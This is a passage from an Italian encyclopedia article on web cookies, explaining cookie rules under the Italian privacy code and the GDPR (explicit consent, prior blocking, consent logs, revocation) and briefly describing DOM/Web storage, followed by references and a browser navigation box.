In merito ai chiarimenti richiesti sull'ambito di applicazione della normativa in materia di cookie ^[19] , si evidenzia che la stessa riguarda tutti i siti che, a prescindere dalla presenza di una sede nel territorio dello Stato, installano cookie sui terminali degli utenti, utilizzando quindi per il trattamento "strumenti situati sul territorio dello Stato" (cfr. art. 5, comma 2, del Codice privacy ^[20] ).

Dal 25 maggio 2018 la regolamentazione sui cookie è prescritta dal GDPR (vedi paragrafo).

La nuova legislazione europea: il GDPR

Dal 25 maggio 2018 è applicato il regolamento generale sulla protezione dei dati (GDPR, General Data Protection Regulation- Regolamento UE 2016/679) . Il GDPR sostituisce l'attuale legge italiana sulla protezione dei dati (ufficialmente Direttiva 95/46/EC) ^[21] e abroga le norme del Codice per la protezione dei dati personali (dlgs.n. 196/2003) che risulteranno con esso incompatibili. Pertanto, gli articoli del codice italiano che non siano specificatamente coperti dal GDPR rimangono in vigore (a meno di futuri provvedimenti legislativi).

Secondo la Commissione Europea "i dati personali sono qualunque informazione relativa a un individuo, collegata alla sua vita sia privata, sia professionale o pubblica. Può riguardare qualunque dato personale: nomi, foto, indirizzi email, dettagli bancari, interventi su siti web di social network, informazioni mediche o indirizzi IP di computer." ^[22]

Per questo anche i cookie devono essere trattati come dati personali e devono essere gestiti come segue:

I dati personali non possono essere tracciati o usati prima che l'utente abbia dato il consenso esplicito;
Devono essere specificati tutti i tracciamenti dei dati personali su tutte le pagine/URLs del sito coinvolte;
Gli utenti del sito devono essere informati in un linguaggio semplice su:
- Chi riceve i loro dati e come sono usati;
- La data di scadenza dei cookie;
Ogni autorizzazione deve essere salvata/registrata per provare alle autorità che è stata concessa ( Formato della prova );
La revoca del consenso deve essere facile da fare, anche in un secondo momento. ^[23] ^[24]

Inoltre la cookie policy deve contenere la lista di tutti i cookie presenti su tutte le pagine del sito e per ognuno di essi: chi riceve i dati, per cosa sono utilizzati e la data di scadenza.

Nel gennaio 2017 la Commissione Europea propose un'alternativa ^[25] volta a semplificare l'esperienza online, auspicando che siano gli stessi browser a poter gestire le preferenze degli utenti per il consenso/rifiuto dei cookie – eliminando quindi la necessità di gestire le singole accettazione dei cookie nei singoli siti. Questa proposta non ha avuto seguiti ed è stata molto criticata e giudicata non fattibile. ^[26] ^[27]

Tecnicamente i browser non riescono a leggere lo scopo di un cookie (come viene utilizzato) e non possono fornire una sua descrizione in un “linguaggio semplice” così come è richiesto nel GDPR. Inoltre i browser non possono registrare tutti i cookie presenti in un intero sito, ma solo uno per volta per pagina singola. I browser non possono gestire consensi differenti in base ai diversi siti (per cui sarebbe un'accettazione di tutti i cookie o di nessuno) e non possono inoltre fornire il Formato della prova (il salvataggio dei consensi) così come richiesto dal GDPR. Alla luce di nessun nuovo sviluppo di questa proposta da parte della Commissione Europea , i gestori dei siti web dovranno attenersi a quanto richiesto dal GDPR.

Cosa cambia rispetto alla legislazione attuale

Nel caso di un sito con la presenza di soli cookie tecnici/funzionali (shopping cart, selezione lingua, preferenze) e/o di cookie di statistica di prima parte (es. Matomo e simili): rimane tutto come è ora e quindi non è necessario avere un cookie banner, il blocco preventivo dei cookie prima del consenso e il salvataggio dei consensi ( formato della prova) .

In questo caso rientrano anche i cookie di statistica di terza parte come Google Analytics con IP anonimizzato in modo tale che non possa essere ricostruito l'indirizzo IP con tecniche di “reverse engineering”. Utilizzando Google Analytics bisogna quindi disattivare la condivisione dei dati con gli altri prodotti/servizi Google ^[28] , altrimenti si rientra nel caso successivo.

Nel caso di presenza di altri tipi di cookie, e quindi quelli pubblicitari (Google Adsense, DoubleClick, retargeting, ecc) e tutti gli altri di terze parti (Social Network, YouTube, ecc) oltre al cookie banner il GDPR richiede:

il consenso esplicito ( opt-in ) e quindi non più implicito come ad esempio "scrollare" la pagina;
il blocco preventivo dei cookie prima del consenso;
la registrazione dei log del consenso da fornire come “prova”;
la descrizione per ogni cookie che comprende chi riceve i dati, per quale scopo e la data di scadenza;
la possibilità di revocare il consenso in modo semplice anche in un secondo momento.

Tecnologie analoghe

Nel mondo del web storage esiste anche il DOM storage ^[29] ^[30] che è una tipologia di contenuti evoluti che ha funzioni simili ai cookie. In pratica, è un cookie articolato e complesso. Ogni sistema operativo, mediante il browser, archivia le informazioni memorizzate dai siti web visitati che alimentano il DOM storage (detto anche Web Storage ) ^[31] che può essere disabilitato e/o cancellato esattamente come i cookie. Oltre ai cookie i browser hanno un'opzione per abilitare o disabilitare l'archiviazione del dom storage dei siti web che lo richiedono ^[32] .

Note

^ Cookie generalmente significa "biscottino" in inglese, in particolare è un biscotto al burro con gocce di cioccolato tipico della cultura statunitense, ma il termine viene usato in questo caso per riferirsi ai biscottini per animali domestici, e più in generale col significato di "piccolo premio".
^ ( EN ) Tim Jackson, This bug in your PC is a smart cookie , in Financial Times , 12 Feb 1996 - #12 (archiviato dall'originale ) urlarchivio richiede url ( aiuto ) .
^ Gmail cookie stolen via Google Spreadsheets , su CNET . URL consultato il 12 maggio 2016 .
^ What about the "EU Cookie Directive" , su Web Cookies Scanner . URL consultato il 12 maggio 2016 .
^ New net rules set to make cookies crumble , su BBC News . URL consultato il 12 maggio 2016 .
^ ( EN ) Cookies and privacy , su europarl.europa.eu . URL consultato il 28 maggio 2016 .
^ ( EN ) Sessions and security , su php.net . URL consultato il 28 maggio 2016 (archiviato dall' url originale il 29 gennaio 2016) .
^ http://www.youronlinechoices.com/it/a-proposito
^ 'SameSite' cookie attribute - Chrome Platform Status , su www.chromestatus.com . URL consultato il 7 maggio 2016 .
^ Learn more about the Public Suffix List , su publicsuffix.org . URL consultato il 24 maggio 2016 .
^ Sul web si trovano facilmente pagine che indicano i percorsi di archiviazione dei cookie per ogni caso.
^ http://www.normattiva.it/atto/caricaArticolo?art.progressivo=0&art.idArticolo=122&art.versione=2&art.codiceRedazionale=003G0218&art.dataPubblicazioneGazzetta=2003-07-29&atto.tipoProvvedimento=DECRETO%20LEGISLATIVO&art.idGruppo=36&art.idSottoArticolo1=10&art.idSottoArticolo=1&art.flagTipoArticolo=0#art
^ Direttiva 2009-136-CE - Garante Privacy , su www.garanteprivacy.it . URL consultato il 10 gennaio 2016 .
^ Cookies a prova di privacy: le modifiche introdotte dal D.Lgs. 69/12 (1ª Parte) | CINDI
^ Individuazione delle modalità semplificate per l'informativa e... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .
^ Internet: Garante privacy, no ai cookie per profilazione senza consenso - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .
^ Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall'url originale il 13 gennaio 2016) .
^ Le nuove regole in materia di Cookie , su ict4executive.it . URL consultato il 26 maggio 2015 (archiviato dall' url originale il 26 maggio 2015) .
^ Chiarimenti in merito all'attuazione della normativa in materia di cookie - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale l'8 gennaio 2016) .
^ Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 13 gennaio 2016) .
^ Direttiva 95/46/CE , su eur-lex.europa.eu .
^ European Commission's press release announcing the proposed comprehensive reform of data protection rules , su europa.eu .
^ Implicazioni del GDPR sulla gestione dei cookie (in inglese) ( PDF ), su onetrust.com .
^ Implicazioni del GDPR sulla gestione dei cookie (in inglese) ^{[ collegamento interrotto ]} , su ittrust.eu .
^ Proposta ePrivacy , su ec.europa.eu .
^ Posizione IAB Europe ( PDF ), su iabeurope.eu . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .
^ Critica proposta ePrivacy (in inglese) , su adversitement.com . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .
^ Come disattivare la condivisione dei dati su Google Analyitcs , su iubenda.com .
^ Document Object Model storage
^ http://www.matarrelli.com/w3c/cose-il-dom-storage
^ HTML5 Web Storage.(
^ https://www.isunshare.com/blog/enable-dom-storage-in-ie-ff-google-chrome-windows-10/

Voci correlate

Altri progetti

Wikimedia Commons contiene immagini o altri file su cookie

Collegamenti esterni

Manuale - Breve spiegazione di come abilitare i cookie nei vari browser e sistemi operativi
Controlla le tue informazioni registrate dai "Flash Cookie" , su abtechno.org .
Attacco ai Cookie - Descrizione e Contromisure della tecnica di Hacking Cookie Manipulation

Portale Informatica	Portale Internet
Portale Telecomunicazioni	Portale Telematica

[1] Cookie generalmente significa "biscottino" in inglese, in particolare è un biscotto al burro con gocce di cioccolato tipico della cultura statunitense, ma il termine viene usato in questo caso per riferirsi ai biscottini per animali domestici, e più in generale col significato di "piccolo premio".

[2] ( EN ) Tim Jackson, This bug in your PC is a smart cookie , in Financial Times , 12 Feb 1996 - #12 (archiviato dall'originale ) urlarchivio richiede url ( aiuto ) .

[3] Gmail cookie stolen via Google Spreadsheets , su CNET . URL consultato il 12 maggio 2016 .

[4] What about the "EU Cookie Directive" , su Web Cookies Scanner . URL consultato il 12 maggio 2016 .

[5] New net rules set to make cookies crumble , su BBC News . URL consultato il 12 maggio 2016 .

[6] ( EN ) Cookies and privacy , su europarl.europa.eu . URL consultato il 28 maggio 2016 .

[7] ( EN ) Sessions and security , su php.net . URL consultato il 28 maggio 2016 (archiviato dall' url originale il 29 gennaio 2016) .

[8] ttp://www.youronlinechoices.com/it/a-proposito

[9] 'SameSite' cookie attribute - Chrome Platform Status , su www.chromestatus.com . URL consultato il 7 maggio 2016 .

[10] Learn more about the Public Suffix List , su publicsuffix.org . URL consultato il 24 maggio 2016 .

[11] Sul web si trovano facilmente pagine che indicano i percorsi di archiviazione dei cookie per ogni caso.

[12] ttp://www.normattiva.it/atto/caricaArticolo?art.progressivo=0&art.idArticolo=122&art.versione=2&art.codiceRedazionale=003G0218&art.dataPubblicazioneGazzetta=2003-07-29&atto.tipoProvvedimento=DECRETO%20LEGISLATIVO&art.idGruppo=36&art.idSottoArticolo1=10&art.idSottoArticolo=1&art.flagTipoArticolo=0#art

[13] Direttiva 2009-136-CE - Garante Privacy , su www.garanteprivacy.it . URL consultato il 10 gennaio 2016 .

[14] Cookies a prova di privacy: le modifiche introdotte dal D.Lgs. 69/12 (1ª Parte) | CINDI

[15] Individuazione delle modalità semplificate per l'informativa e... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .

[16] Internet: Garante privacy, no ai cookie per profilazione senza consenso - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .

[17] Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall'url originale il 13 gennaio 2016) .

[18] Le nuove regole in materia di Cookie , su ict4executive.it . URL consultato il 26 maggio 2015 (archiviato dall' url originale il 26 maggio 2015) .

[19] Chiarimenti in merito all'attuazione della normativa in materia di cookie - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale l'8 gennaio 2016) .

[20] Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 13 gennaio 2016) .

[21] Direttiva 95/46/CE , su eur-lex.europa.eu .

[22] European Commission's press release announcing the proposed comprehensive reform of data protection rules , su europa.eu .

[23] Implicazioni del GDPR sulla gestione dei cookie (in inglese) ( PDF ), su onetrust.com .

[24] Implicazioni del GDPR sulla gestione dei cookie (in inglese) ^{[ collegamento interrotto ]} , su ittrust.eu .

[25] Proposta ePrivacy , su ec.europa.eu .

[26] Posizione IAB Europe ( PDF ), su iabeurope.eu . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .

[27] Critica proposta ePrivacy (in inglese) , su adversitement.com . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .

[28] Come disattivare la condivisione dei dati su Google Analyitcs , su iubenda.com .

[29] Document Object Model storage

[30] ttp://www.matarrelli.com/w3c/cose-il-dom-storage

[31] HTML5 Web Storage.(

[32] ttps://www.isunshare.com/blog/enable-dom-storage-in-ie-ff-google-chrome-windows-10/

[1]

[2]

[3]

[4]

[5]

[6]

[7]

[8]

[9]

[10]

[11]

[12]

[13]

[14]

[15]

[16]

[17]

[18]

[19]

[20]

[21]

[22]

[23]

[24]

[25]

[26]

[27]

[28]

[29]

[30]

[31]

[32]

V ·D · M Browser Internet
Caratteristiche · standard · protocolli
Caratteristiche	Segnalibri · Estensioni · Navigazione privata · Sincronizzazione
Standard	HTML ( v5 ) · CSS · DOM · JavaScript ( IndexedDB · Web storage · WebAssembly · WebGL )
Protocolli	HTTP ( v2 · v3 · Cookies · Crittografia ) · OCSP · WebRTC · WebSocket
Attivi
Basati su Blink	Avast Secure Browser · Beaker · Blisk · Brave · Chrome · Chromium · Cốc Cốc · Dragon · Edge · Epic · Falkon · Kinza · Maxthon · Opera · Otter · Puffin · SalamWeb · Samsung Internet · Silk · Sleipnir · Sputnik · SRWare · Torch · UC · Vivaldi · Whale · Yandex
Basati su Gecko	Firefox ( per Android ) · GNU IceCat · IceDragon · K-Meleon · PirateBrowser · SeaMonkey · SlimBrowser · TenFourFox · Tor · Waterfox
Basati su WebKit	Dolphin · Dooble · Firefox per iOS · GNOME Web · iCab · Konqueror · Midori · Safari · surf
Altro	360 · Avant · Basilisk · Cake Browser · CM Browser · eww · Internet Explorer · Links · Lunascape · Lynx · NetFront · NetSurf · Pale Moon · QQ browser · qutebrowser · w3m · WebbIE
Inattivi
Basati su Gecko	Beonex Communicator · Camino · Classilla · Conkeror · Galeon · Ghostzilla · Kazehakase · Kylo · Lotus · MicroB · Minimo · Mozilla suite · Pogo · Strata · Swiftfox · Swiftweasel · Timberwolf · xB
Basati su Trident	AOL · Deepnet · GreenBrowser · MediaBrowser · MenuBox · NeoPlanet · NetCaptor · SpaceTime · UltraBrowser · ZAC
Basati su WebKit	Arora · BOLT · Opera Coast · Flock · Fluid · Google TV · Iris · Mercury · OmniWeb · Origyn · QtWeb · rekonq · RockMelt · Shiira · Steel · Browser for Symbian · Uzbl · WebPositive · xombrero
Altro	abaco · Amaya · Arachne · Arena · Blazer · Charon · Deepfish · Dillo · ELinks · Gazelle · HotJava · IBM Home Page Reader · IBM WebExplorer · IBrowse · KidZui · Line Mode · Mosaic · MSN TV · NetPositive · Netscape · Skweezer · Skyfire · Teashark · ThunderHawk · Vision · WinWAP · WorldWideWeb
Categoria · Diffusione